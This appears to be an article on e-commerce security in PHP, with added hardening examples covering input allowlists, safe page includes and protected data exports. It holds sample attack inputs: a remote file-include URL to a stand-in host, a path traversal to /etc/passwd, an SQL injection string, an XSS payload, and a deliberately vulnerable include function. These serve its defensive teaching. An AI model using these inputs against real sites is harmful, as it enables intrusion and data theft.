
E-Commerce Security - Plugging the Security Holes

By Paul Roberts

Security needs to be a major consideration when developing an e-commerce website or e-commerce software, and the developer must be aware of the relevant threats while designing the site. As e-commerce becomes more commonplace, the number of attacks against shops is certainly increasing. Paranoia is a healthy thing for e-commerce developers: keep up to date with security issues and keep your eyes and ears open. The loopholes below are serious, but where they are present they are easily fixed.

Listed below are some security considerations to include when developing a site. This article does not cover e-shoplifting; please see my separate article on that.

User input - every input, whether it is a quantity, a product search, a name or anything else, needs to be validated before it is used. Unvalidated input is the root of injection attacks: it can end up as part of an SQL query (SQL injection), as script in a page shown to other customers (cross-site scripting) or, if the input is written into a file that PHP later includes or is passed to eval(), as PHP code that runs on your server. A string such as "?>" (the closing PHP tag) is harmless on its own; it only becomes dangerous when the input reaches somewhere PHP parses it as source, which is exactly what validation should prevent.

It is far safer to allow only the characters you expect (for example the letters a-z and A-Z and the digits 0-9) and reject everything else, than to try to list every character that should not be there. In PHP a regular expression anchored at both ends does this in a single call, so there is no need to walk through the string character by character. The check must be done in server-side code, not in JavaScript: client-side validation is only a convenience for the user, because an attacker can bypass it by sending the request directly. Validation limits what gets in, but the value still has to be handled correctly where it is used, with prepared statements for SQL and htmlspecialchars() for anything echoed into HTML. Server-side input validation is essential to keep unwanted characters out.
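The allowlist approach described above, as an added example that is not code from the original article or the author's software. The field names (qty, search, name), the patterns and the length limits are assumptions chosen for illustration; the sample requests are constructed, standing in for $_GET or $_POST.

```php
<?php
// Added example, not code from the original article: server-side allowlist
// validation for the kinds of input the article mentions. The field names,
// patterns and length limits are assumptions chosen for illustration.

declare(strict_types=1);

// One rule per field: a regex the WHOLE value must match (anchored with \A
// and \z) plus a maximum length. Anything outside the rule is rejected, so
// there is no list of "bad" characters to keep up to date.
const INPUT_RULES = [
    'qty'    => ['pattern' => '/\A[1-9][0-9]{0,2}\z/',                'max' => 3],
    'search' => ['pattern' => '/\A[A-Za-z0-9]+(?: [A-Za-z0-9]+)*\z/',  'max' => 40],
    'name'   => ['pattern' => '/\A[A-Za-z]+(?:[ \'\-][A-Za-z]+)*\z/', 'max' => 60],
];

// Returns the validated string, or null when the field is absent, is not a
// plain string (e.g. ?qty[]=1 arrives as an array), is too long, or contains
// anything outside its allowlist.
function validate_field(string $field, array $request): ?string
{
    if (!array_key_exists($field, INPUT_RULES) || !isset($request[$field])) {
        return null;
    }
    $value = $request[$field];
    $rule  = INPUT_RULES[$field];
    if (!is_string($value) || strlen($value) > $rule['max']) {
        return null;
    }
    return preg_match($rule['pattern'], $value) === 1 ? $value : null;
}

// Validate every field a form is expected to send. Missing or invalid fields
// are reported by name so the page can show an error instead of proceeding.
function validate_request(array $fields, array $request): array
{
    $clean = [];
    $bad   = [];
    foreach ($fields as $field) {
        $value = validate_field($field, $request);
        if ($value === null) {
            $bad[] = $field;
        } else {
            $clean[$field] = $value;
        }
    }
    return ['clean' => $clean, 'bad' => $bad];
}

// Validation limits what gets in; output still has to be handled for its
// context. Anything echoed into HTML goes through htmlspecialchars(), and
// anything used in a query goes through a prepared statement (commented
// PDO usage below, not executed here).
function html(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Constructed sample requests, standing in for $_GET / $_POST.
$requests = [
    ['qty' => '3',  'search' => 'blue widget',         'name' => "O'Brien"],
    ['qty' => '3;', 'search' => "' OR 1=1 -- ",        'name' => 'Smith'],
    ['qty' => '2',  'search' => '?><?php phpinfo();',  'name' => ['x']],
];

foreach ($requests as $req) {
    $result = validate_request(['qty', 'search', 'name'], $req);
    if ($result['bad'] !== []) {
        echo 'rejected fields: ' . implode(', ', $result['bad']) . "\n";
        continue;
    }
    $c = $result['clean'];
    echo 'ok: searching for "' . html($c['search']) . '" x' . $c['qty'] . "\n";
    // $stmt = $pdo->prepare('SELECT * FROM products WHERE name LIKE ?');
    // $stmt->execute(['%' . $c['search'] . '%']);
}
```

Run with the PHP command-line interpreter: the first request passes, the second is rejected on qty and search, and the third is rejected on search (the "?>" and "<?php" characters are outside the allowlist) and on name (an array, not a string). Because every pattern is anchored and every field has a maximum length, a new kind of dangerous character never requires a code change.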

There is another major risk in the way PHP loads code. PHP has a setting called allow_url_fopen, which lets file functions such as fopen() and file_get_contents() open URLs instead of only local files, and, from PHP 5.2 onwards, a separate setting called allow_url_include, which controls whether include and require may load code from a URL. Both should be turned off unless absolutely necessary (allow_url_include is off by default in PHP 5.2 and later), and, whatever the settings, no user-controlled value should ever be passed to include.

Imagine you have PHP scripts for a fixed header and footer, and pages are reached through a URL such as http://www.mysite.com/index.php?page=page2, with index.php including the file named in the page parameter. All it takes is a malicious user to change that parameter to http://www.mysite.com/index.php?page=http://www.evilhack.com/hacker.txt, with PHP code in the file hacker.txt, and that code runs on your server with the web server's privileges. Anything could happen: PHP files read, files deleted, vital information stolen. Even with remote includes disabled, the same script lets a visitor include local files (for example ?page=../../etc/passwd) unless the parameter is restricted to a fixed list of pages.

If you are not sure whether these settings are on or off, copy the following PHP code into a text file, upload it to your web server and open it in a browser:

<?php
phpinfo();
?>

When you access the script on your web server, you will find allow_url_fopen (and, on PHP 5.2 or later, allow_url_include) listed in the Core section of the configuration table.

A visitor to your site cannot normally find the value of this setting, but the phpinfo() page you have just uploaded reveals it along with a great deal else (PHP version, loaded modules, file paths), so delete that file as soon as you have read the value.
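The include pattern described above next to a hardened version, plus a check of the two ini settings, as an added example that is not code from the original article or the author's software. The file names (header.php, footer.php, the pages/ directory) and the page keys are assumptions; ini_get() and filter_var() are standard PHP functions, so the check can replace uploading a phpinfo() page.

```php
<?php
// Added example, not code from the original article: the vulnerable
// ?page= include pattern beside a hardened version, and a check of the
// settings that control remote file access. File and page names are
// assumptions.

declare(strict_types=1);

// VULNERABLE (do not use): whatever the visitor puts in ?page= is included.
// With allow_url_include=On, ?page=http://www.evilhack.com/hacker.txt runs
// the attacker's code; even with it Off, ?page=../../etc/passwd still reads
// local files (local file inclusion).
function vulnerable_page(array $get): void
{
    include 'header.php';
    include $get['page'];          // untrusted value reaches include
    include 'footer.php';
}

// HARDENED: the parameter is only a key into a fixed map of allowed pages.
// No part of the visitor's string is ever used as a path.
const PAGES = [
    'home'    => 'pages/home.php',
    'page2'   => 'pages/page2.php',
    'contact' => 'pages/contact.php',
];

function resolve_page(array $get): string
{
    $key = $get['page'] ?? 'home';
    if (!is_string($key) || !array_key_exists($key, PAGES)) {
        return PAGES['home'];      // or send a 404; never echo the raw key unescaped
    }
    return PAGES[$key];
}

function safe_page(array $get): void
{
    include 'header.php';
    include resolve_page($get);
    include 'footer.php';
}

// Report the two settings without leaving a phpinfo() page on the server.
// ini_get() returns the raw ini string ("1", "On", "0", "" ...), or false
// when the setting does not exist (allow_url_include before PHP 5.2).
function remote_file_settings(): array
{
    return [
        'allow_url_fopen'   => filter_var(ini_get('allow_url_fopen'),   FILTER_VALIDATE_BOOLEAN),
        'allow_url_include' => filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN),
    ];
}

// Constructed page parameters: one legitimate, one remote include attempt,
// one directory traversal attempt. Only the first reaches a real page.
foreach (['page2', 'http://www.evilhack.com/hacker.txt', '../../etc/passwd'] as $p) {
    printf("%-40s -> %s\n", $p, resolve_page(['page' => $p]));
}
foreach (remote_file_settings() as $setting => $on) {
    printf("%-18s %s\n", $setting, $on ? 'On  (turn off unless needed)' : 'Off');
}
```

The hardened version makes the ini settings a second line of defence rather than the only one: even if a hosting provider turns allow_url_include back on, the visitor's string never reaches include. Run the script from the command line or as a page; unlike phpinfo(), it reveals only the two values you are interested in, and it should still not be left on a production server.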

Be careful with exported data such as orders or products in CSV or MySQL dump files. If the data is exported by a script and kept on the web server under a common file name, for example http://www.mysite.com/admin/output_tables.csv, anyone who knows or guesses the name can download it. All it takes is for a hacker to find the file name by looking at the e-commerce software's demo website and then request the same name on a real site. This is only a problem when the exported file resides in a publicly accessible directory, which points to the fixes. First, keep the export out of reach of direct requests, either in a password-protected directory or, better, outside the web root, and hand it out only through a script that checks the store owner is logged in. Second, do not write a file at all: place the data inside an HTML textarea form element on a password-protected admin page, escaped so that data entered by a customer cannot break out of the element. The store owner can then copy the text from the textarea and paste it into a new file on their own computer.
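Both fixes described above, as an added example that is not code from the original article or the author's software. The export directory (/var/shop/exports, assumed to be outside the web root), the file-name scheme and the $is_admin flag (assumed to come from the shop's own session check) are assumptions; the order rows are constructed sample data.

```php
<?php
// Added example, not code from the original article: exports are written to
// a directory outside the web root under an unguessable name and streamed
// only to an authenticated administrator, or shown escaped in a textarea.
// The directory, the name scheme and the admin check are assumptions.

declare(strict_types=1);

// Directory OUTSIDE the document root, so no URL maps to it.
const EXPORT_DIR = '/var/shop/exports';

// Write order rows as CSV under a random name and return that name.
function write_export(array $rows): string
{
    $name = 'orders-' . date('Ymd') . '-' . bin2hex(random_bytes(8)) . '.csv';
    $path = EXPORT_DIR . '/' . $name;
    $fh = fopen($path, 'x');           // 'x' fails instead of overwriting
    if ($fh === false) {
        throw new RuntimeException('cannot create export file');
    }
    foreach ($rows as $row) {
        fputcsv($fh, $row);            // fputcsv handles quoting
    }
    fclose($fh);
    return $name;
}

// Only names produced by write_export() are accepted, so "../" or an
// absolute path in the request can never select a different file.
function is_valid_export_name(string $name): bool
{
    return preg_match('/\Aorders-[0-9]{8}-[0-9a-f]{16}\.csv\z/', $name) === 1;
}

// download.php?file=...  Streams the file to an authenticated admin only.
// $is_admin is whatever the shop's own login check returns (assumption).
function serve_export(string $name, bool $is_admin): void
{
    if (!$is_admin) {
        http_response_code(403);
        exit;
    }
    if (!is_valid_export_name($name) || !is_file(EXPORT_DIR . '/' . $name)) {
        http_response_code(404);
        exit;
    }
    header('Content-Type: text/csv');
    header('Content-Disposition: attachment; filename="' . $name . '"');
    header('Cache-Control: no-store');
    readfile(EXPORT_DIR . '/' . $name);
}

// The article's second option: the CSV inside a <textarea> on an admin page.
// The data MUST be escaped, otherwise a customer who enters
// "</textarea><script>..." as their name breaks out of the element
// (stored cross-site scripting against the store owner).
function csv_textarea(array $rows): string
{
    $fh = fopen('php://memory', 'w+');
    foreach ($rows as $row) {
        fputcsv($fh, $row);
    }
    rewind($fh);
    $csv = stream_get_contents($fh);
    fclose($fh);
    return '<textarea rows="20" cols="100" readonly>'
        . htmlspecialchars($csv, ENT_QUOTES | ENT_HTML5, 'UTF-8')
        . '</textarea>';
}

// Constructed sample orders, including one hostile customer name.
$orders = [
    ['order_id', 'customer', 'total'],
    [1001, 'Jane Smith', '49.90'],
    [1002, '</textarea><script>alert(1)</script>', '12.00'],
];

foreach (['orders-20080605-0123456789abcdef.csv', '../../../etc/passwd', 'output_tables.csv'] as $n) {
    printf("%-40s valid name: %s\n", $n, is_valid_export_name($n) ? 'yes' : 'no');
}
echo csv_textarea($orders), "\n";
```

Run from the command line to see the name check reject the traversal and the guessable name, and to see the hostile customer name rendered as harmless text inside the textarea. write_export() and serve_export() are not called in the demo because they need the real directory and the shop's login check; in the download script, pass the session's admin flag to serve_export() and nothing else from the request except the file name.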
About the Author

Paul Roberts
I run a software development company specialising in E-Commerce, Search Engine Optimization, and Print Estimation software called ROBO Design Solutions. I also develop New Zealand E-Commerce Solutions and Software under the name ROBO Design.

Article Source: http://www.articlesphere.com/Article/E-Commerce-Security---Plugging-the-Security-Holes/145459

Article Submitted: 2008-06-05
